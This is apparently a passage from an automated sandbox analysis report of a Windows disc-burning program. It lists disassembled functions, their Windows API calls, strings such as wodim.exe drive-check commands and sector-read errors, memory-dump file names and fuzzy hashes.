SHGetFileInfoW.SHELL32(00000000,00000080,?,000002B4,00004010), ref: 0044619B
wsprintfW.USER32 ref: 00446240
lstrcpyW.KERNEL32(?,-00000008), ref: 00446388

Strings

%04u-%02u-%02u %02u:%02u:%02u, xrefs: 0044623A
%I64d, xrefs: 00446274
%.2d:%.2d:%.2d, xrefs: 0044636C

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: FileInfo$MessageSendlstrcpywsprintf
String ID: %.2d:%.2d:%.2d$%04u-%02u-%02u %02u:%02u:%02u$%I64d
API String ID: 3264957514-809063399
Opcode ID: aba75bc4777cab3c63d094f16533cf4cfb48ec7ae8208d8ce0da1a560d9358fc
Instruction ID: 2529cf20aff1018b6470dc90a97561a3f7981269c04b9c0e3b029375da9ff709
Opcode Fuzzy Hash: aba75bc4777cab3c63d094f16533cf4cfb48ec7ae8208d8ce0da1a560d9358fc
Instruction Fuzzy Hash: 0871D3B1700740ABE714DF65CC45F7BB7E9BBC9704F144A1EB84AD7282E678E801876A

Function 00462B20 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 181windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00462B61
SendMessageW.USER32(00000000,00008001,00000001,00000000), ref: 00462B78
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00462B92
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00462BA9
SendMessageW.USER32(?,00000151,00000000,000000FF), ref: 00462BB7
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00462BC4
SendMessageW.USER32(?,00000143,00000000,?), ref: 00462CDA
SendMessageW.USER32(?,00000146,00000000,00000000), ref: 00462D04
SendMessageW.USER32(?,00000151,-00000001,?), ref: 00462D15

Strings

%dx, xrefs: 00462CBC

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$Parent
String ID: %dx
API String ID: 1020955656-2659715764
Opcode ID: 654e681229a79dbf95e631275b1ca45c9ca7d2bc1dc2c2f1d7ca18d67c8e76a5
Instruction ID: b280f0b77723ccd9fe800ca97de38ab71473df1a527b17c9d299c8f10b9ab57a
Opcode Fuzzy Hash: 654e681229a79dbf95e631275b1ca45c9ca7d2bc1dc2c2f1d7ca18d67c8e76a5
Instruction Fuzzy Hash: 9951B071204304ABD320DB59CD81FABB7E9EF88748F40491EF68997291EA79E8048766

Function 00456A40 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 153windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00456AA9
CreateCompatibleDC.GDI32 ref: 00456ADE
CreateDIBSection.GDI32(?,?,00000000,?,00000000,00000000), ref: 00456AF7
SelectObject.GDI32(00000000,00000000), ref: 00456B03
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 00456B24

Strings

(, xrefs: 00456AC0

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Create$CompatibleObjectSectionSelect_memset
String ID: (
API String ID: 726717497-3887548279
Opcode ID: df63426c0d17b72bb7a8371683e3d38f3bd5ee1a16bdd3d05fa8623e9092fab3
Instruction ID: 07b9bb2e6063a37eaf900f040fabf9d9cea18bc2a57079a1157f8cf5dd0559ca
Opcode Fuzzy Hash: df63426c0d17b72bb7a8371683e3d38f3bd5ee1a16bdd3d05fa8623e9092fab3
Instruction Fuzzy Hash: 0951D1725083409FC310CF29CD84B6BBBE9EFC5301F05492EF5858B252D675E90ACB66

Function 00442530 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114stringCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0044254E
DefWindowProcW.USER32(00000000,00000000,00000000,00000000), ref: 0044255C
InitCommonControlsEx.COMCTL32 ref: 00442577

Part of subcall function 0043EEB0: GetCurrentThreadId.KERNEL32 ref: 0043EEFE

Part of subcall function 004651E0: MessageBoxW.USER32(00000000,?,00000000,00000030), ref: 00465296

Part of subcall function 00440FB0: GetCurrentProcess.KERNEL32(00000000,0000000D), ref: 00440FE6
Part of subcall function 00440FB0: FlushInstructionCache.KERNEL32(00000000), ref: 00440FED
Part of subcall function 00440FB0: CreateDialogParamW.USER32(?,000000CD,000000E9,Function_000166E0,?), ref: 0044101D

GetModuleFileNameW.KERNEL32(00000000,?,00000103), ref: 004425FB
lstrcatW.KERNEL32(?,Codecs\), ref: 00442618
GetActiveWindow.USER32 ref: 00442659
IsWindow.USER32(?), ref: 004426A0
DestroyWindow.USER32(?,?,?), ref: 004426B1
CoUninitialize.OLE32(?,?), ref: 004426C1

Part of subcall function 00436AC0: lstrcpyW.KERNEL32(TLL,004C4C54), ref: 00436AF3
Part of subcall function 00436AC0: lstrcatW.KERNEL32(005396DC,005396DC), ref: 00436B09
Part of subcall function 00436AC0: lstrcatW.KERNEL32(?,wodim.exe), ref: 00436B15
Part of subcall function 00436AC0: lstrcatW.KERNEL32 ref: 00436B2B

Part of subcall function 004431E0: MessageBoxW.USER32(?,?,?,?), ref: 00443271

Strings

Codecs\, xrefs: 0044260E

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Windowlstrcat$CurrentMessage$ActiveCacheCommonControlsCreateDestroyDialogFileFlushInitInitializeInstructionModuleNameParamProcProcessThreadUninitializelstrcpy
String ID: Codecs\
API String ID: 243082106-1564055866
Opcode ID: 58ef2a6fa1f37aca309b5d00dd659fe7825ae541d49eac8b5a2d7638a7bfaf4f
Instruction ID: cda2cf141104aff53fed462108df41c285446a9b5d20dcc3f1ab1fc9c3880dc3
Opcode Fuzzy Hash: 58ef2a6fa1f37aca309b5d00dd659fe7825ae541d49eac8b5a2d7638a7bfaf4f
Instruction Fuzzy Hash: 2841E5716043017BF364BBA1ED27F6A37A4BB88709F40442EF7465A2D1DEB85908C76E

Function 00436D10 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 91stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32 ref: 00436D46
lstrcatW.KERNEL32(?,005396DC), ref: 00436D5C
lstrcatW.KERNEL32(?,wodim.exe), ref: 00436D68
lstrcatW.KERNEL32(?," -checkdrive dev=), ref: 00436D74
lstrlenW.KERNEL32(?), ref: 00436D7B
_memset.LIBCMT ref: 00436DB8
lstrcatW.KERNEL32(?,?), ref: 00436E05

Strings

wodim.exe, xrefs: 00436D5E
%c:, xrefs: 00436DED
" -checkdrive dev=, xrefs: 00436D6A

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrcat$_memsetlstrcpylstrlen
String ID: " -checkdrive dev=$%c:$wodim.exe
API String ID: 94685756-2902528229
Opcode ID: 4edd1ebb4b21df85329c16ecba64b295e253d41be42094a829501fb7a98b9b69
Instruction ID: 98b334739e4b0cefb23cd6163b53a08e48b16397339128c64da9a985df9f1e08
Opcode Fuzzy Hash: 4edd1ebb4b21df85329c16ecba64b295e253d41be42094a829501fb7a98b9b69
Instruction Fuzzy Hash: B631E4B5600701ABC710DFA0D896FABB7A8EF88344F41491EF55943180D7B8E5498B99

Function 00436BF0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 85stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32 ref: 00436C26
lstrcatW.KERNEL32(?,005396DC), ref: 00436C3C
lstrcatW.KERNEL32(?,wodim.exe), ref: 00436C48
lstrcatW.KERNEL32(?," -prcap dev=), ref: 00436C54
lstrlenW.KERNEL32(?), ref: 00436C5B
_memset.LIBCMT ref: 00436C88
lstrcatW.KERNEL32(?,?), ref: 00436CC1

Strings

wodim.exe, xrefs: 00436C3E
" -prcap dev=, xrefs: 00436C4A
%c:, xrefs: 00436CA9

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrcat$_memsetlstrcpylstrlen
String ID: " -prcap dev=$%c:$wodim.exe
API String ID: 94685756-315483891
Opcode ID: b02c7612a7589b17e70109e7b7fe5a86aceed74941e6af893271d2da320397d1
Instruction ID: 9f1c628ad3cd2bb0ea04c161e498aa3a3dd81629a318a82e3ed834260be61122
Opcode Fuzzy Hash: b02c7612a7589b17e70109e7b7fe5a86aceed74941e6af893271d2da320397d1
Instruction Fuzzy Hash: E63102B1500704AFC310DBA0DC86FABB7A8FF88344F40492EF59943141DBB8A1488B59

Function 00460F80 Relevance: 16.6, APIs: 11, Instructions: 124windowCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000C), ref: 00460FA9
GetSystemMetrics.USER32(0000000B), ref: 00460FAE
LoadImageW.USER32(?,000000D4,00000001,00000000), ref: 00460FB9
GetDlgItem.USER32(?,000003FE), ref: 00460FD1
SendMessageW.USER32(00000000,00000170,?,00000000), ref: 00460FDF
SetDlgItemTextW.USER32(?,00000429,00000000), ref: 00460FFF
GetDlgItem.USER32(?,00000429), ref: 0046100A
EnableWindow.USER32(00000000,00000000), ref: 0046100F
SetDlgItemTextW.USER32(?,00000402,00000000), ref: 00461029

Part of subcall function 00477440: _vswprintf_s.LIBCMT ref: 00477459

SetDlgItemTextW.USER32(?,0000042C,?), ref: 0046106D
SetDlgItemTextW.USER32(?,0000042D,?), ref: 004610CE

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Item$Text$MetricsSystem$EnableImageLoadMessageSendWindow_vswprintf_s
String ID:
API String ID: 2764524006-0
Opcode ID: 4605b3f47392ef8b03e01b0a37c3edaaeca1c1390dad486293d0a8310d2376b5
Instruction ID: 7ff7d2457c6a357b17fb10e46e244178dd0a7d86623513d2b74668b4b4e3d70f
Opcode Fuzzy Hash: 4605b3f47392ef8b03e01b0a37c3edaaeca1c1390dad486293d0a8310d2376b5
Instruction Fuzzy Hash: 204132F5644300BFE214EBA5DD82F7BB3ADABC8B04F04491DB74996281D674E904876A

Function 00442AB0 Relevance: 16.6, APIs: 11, Instructions: 99stringCOMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000011), ref: 00442B05
SelectObject.GDI32(?,00000000), ref: 00442B17
SetBkMode.GDI32(?,00000001), ref: 00442B22
GetStockObject.GDI32(00000011), ref: 00442B36
SelectObject.GDI32(?,00000000), ref: 00442B51
SetBkMode.GDI32(?,00000001), ref: 00442B5C
GetSysColor.USER32(0000000F), ref: 00442B68
SetTextColor.GDI32(?,00000000), ref: 00442B70
lstrlenW.KERNEL32(?,?,00008020), ref: 00442BB1
DrawTextW.USER32(?,?,00000000), ref: 00442BBA
SelectObject.GDI32(?,00000000), ref: 00442BCA

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Object$Select$ColorModeStockText$Drawlstrlen
String ID:
API String ID: 1027809275-0
Opcode ID: 95db85997f0e3afdae02f0b91f9d3f2344ade8a111a525786d4949c60982b0c0
Instruction ID: 722f4601ebb7c700914b1efc75e3d03e51595c3c098871896a49553974c2c440
Opcode Fuzzy Hash: 95db85997f0e3afdae02f0b91f9d3f2344ade8a111a525786d4949c60982b0c0
Instruction Fuzzy Hash: 25315A75504340AFD384DF95DD49E5BBBE8EBC8714F404A2DFA45933A0DB74A840CB6A

Function 00444320 Relevance: 16.6, APIs: 11, Instructions: 86windowstringCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00444336
_vswprintf_s.LIBCMT ref: 0044435A

Part of subcall function 00492DCB: __vsnwprintf_l.LIBCMT ref: 00492DDE

GetWindowTextLengthW.USER32(?), ref: 0044436C
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0044437F
SendMessageW.USER32(?,000000B7,00000000,00000000), ref: 0044438E
SendMessageW.USER32(?,000000C2,00000000,AD5E02B4), ref: 0044439C
GetWindowTextLengthW.USER32(?), ref: 004443A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004443AF
SendMessageW.USER32(?,000000B7,00000000,00000000), ref: 004443BE
SendMessageW.USER32(?,000000C2,00000000,004C91E0), ref: 004443D0
lstrlenW.KERNEL32(AD5E02B4), ref: 004443E4

Part of subcall function 004BDD40: WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 004BDD74

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$Window$LengthText$FileWrite__vsnwprintf_l_vswprintf_slstrlen
String ID:
API String ID: 3600699354-0
Opcode ID: bc2555db89713fa9bc665a130bd51d4d8faa3df4b3178ba211afdbe451e0d7af
Instruction ID: 5561bfc1d83ad8a3c3f16c869989d91e1e8dd32a2230dc7100d2be4951b1abb2
Opcode Fuzzy Hash: bc2555db89713fa9bc665a130bd51d4d8faa3df4b3178ba211afdbe451e0d7af
Instruction Fuzzy Hash: 212130B13407047BF620A76ADD96F7BB3DC9FC4B04F104919B646A76C1CAB8F8018A68

Function 004310E0 Relevance: 16.1, APIs: 3, Strings: 6, Instructions: 350COMMON

Download Yara Rule

APIs

Part of subcall function 00444320: IsWindow.USER32(?), ref: 00444336
Part of subcall function 00444320: _vswprintf_s.LIBCMT ref: 0044435A
Part of subcall function 00444320: GetWindowTextLengthW.USER32(?), ref: 0044436C
Part of subcall function 00444320: SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0044437F
Part of subcall function 00444320: SendMessageW.USER32(?,000000B7,00000000,00000000), ref: 0044438E
Part of subcall function 00444320: SendMessageW.USER32(?,000000C2,00000000,AD5E02B4), ref: 0044439C
Part of subcall function 00444320: GetWindowTextLengthW.USER32(?), ref: 004443A2
Part of subcall function 00444320: SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004443AF
Part of subcall function 00444320: SendMessageW.USER32(?,000000B7,00000000,00000000), ref: 004443BE
Part of subcall function 00444320: SendMessageW.USER32(?,000000C2,00000000,004C91E0), ref: 004443D0
Part of subcall function 00444320: lstrlenW.KERNEL32(AD5E02B4), ref: 004443E4

Part of subcall function 0042C4A0: _memset.LIBCMT ref: 0042C4DE

GetTickCount.KERNEL32 ref: 004311E9
GetTickCount.KERNEL32 ref: 00431253
GetTickCount.KERNEL32 ref: 004312A8

Strings

Error: Unable to process read data., xrefs: 004314BC
Error: The selected device does not support this kind of operation., xrefs: 00431122, 0043118E
Warning: Failed to read sector range %u-%u, xrefs: 004312E3
Warning: Unable to check device support for feature 0x%.4X., xrefs: 00431109, 00431155
Error: No disc inserted., xrefs: 004311C7
Retry on sector %u failed., xrefs: 00431368

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$CountTickWindow$LengthText$_memset_vswprintf_slstrlen
String ID: Retry on sector %u failed.$ Error: No disc inserted.$ Error: The selected device does not support this kind of operation.$ Error: Unable to process read data.$ Warning: Failed to read sector range %u-%u$ Warning: Unable to check device support for feature 0x%.4X.
API String ID: 3640616713-2396493442
Opcode ID: fdef14f06c04c1182d37aab1ff6ce861c9d2798fe62c18853c78d545135e7031
Instruction ID: e0ff0423ad6e0c71d7ef52139af1c5fc8b5024865133807147958ef95a9ef57b
Opcode Fuzzy Hash: fdef14f06c04c1182d37aab1ff6ce861c9d2798fe62c18853c78d545135e7031
Instruction Fuzzy Hash: 90B1F071A043046BE700EF58DC82E6FB7A5BFC8714F84191EF98057352E639A9058BEA

Function 0045CD80 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 254windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00478830: _memset.LIBCMT ref: 00478878
Part of subcall function 00478830: lstrcpyW.KERNEL32(?,Root,?,?,?,?,?,?,?,004C046B,000000FF), ref: 004788B0

Part of subcall function 00477440: _vswprintf_s.LIBCMT ref: 00477459

MessageBoxW.USER32(?,?,00000000,00000010), ref: 0045CE29

Part of subcall function 004431E0: MessageBoxW.USER32(?,?,?,?), ref: 00443271

Part of subcall function 0045B830: ShowWindow.USER32(?,00000005,?,004EDE74), ref: 0045B86F
Part of subcall function 0045B830: SendMessageW.USER32(?,00001101,00000000,FFFF0000), ref: 0045B8A6
Part of subcall function 0045B830: SendMessageW.USER32(?,00001009,00000000,00000000), ref: 0045B8BB
Part of subcall function 0045B830: GetLocalTime.KERNEL32(?,00000000,004EDE74), ref: 0045B8FA
Part of subcall function 0045B830: GetDateFormatW.KERNEL32(00000400,00000000,?,yyMMdd_,?,00000008), ref: 0045B918

Part of subcall function 004781C0: lstrlenW.KERNEL32(?,?,?,?,004366AB,Vendor,?,00000009,lun,?,target,?,bus,?,004C8410,letter), ref: 004781E2
Part of subcall function 004781C0: lstrcpyW.KERNEL32(?,?,?,004366AB,Vendor,?,00000009,lun,?,target,?,bus,?,004C8410,letter), ref: 004781F4

Strings

Label, xrefs: 0045CF66, 0045D028
dvd, xrefs: 0045CEFB
Project, xrefs: 0045CE77
version, xrefs: 0045CE8E
AlbumArtist, xrefs: 0045CFA2, 0045D002
AlbumName, xrefs: 0045CF8A, 0045CFEA
FeyWriter, xrefs: 0045CE4A
type, xrefs: 0045CEE4

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Message$Sendlstrcpy$DateFormatLocalShowTimeWindow_memset_vswprintf_slstrlen
String ID: AlbumArtist$AlbumName$FeyWriter$Label$Project$dvd$type$version
API String ID: 443366968-3457881475
Opcode ID: ddffe647d46646fd852bb376593660bbed70fd55e28421021508e73c99d92c82
Instruction ID: e7383385592de1d620b5bfd5208803d43fc8c0c0871f168a835c1f053fa2ef1b
Opcode Fuzzy Hash: ddffe647d46646fd852bb376593660bbed70fd55e28421021508e73c99d92c82
Instruction Fuzzy Hash: FA91A471644300AAD624EF61C853FAE7394AF94B09F40490EF549561D3EF7CAA0EC69F

Function 00436EE0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

_swscanf.LIBCMT ref: 00436F6C

Part of subcall function 00492634: _vscan_fn.LIBCMT ref: 0049264B

_strncmp.LIBCMT ref: 00436FA2
_memset.LIBCMT ref: 00436FCF

Part of subcall function 00477350: AreFileApisANSI.KERNEL32(00000001,?,?,?,?,?,?,004267F4,?,?,00000107), ref: 00477378
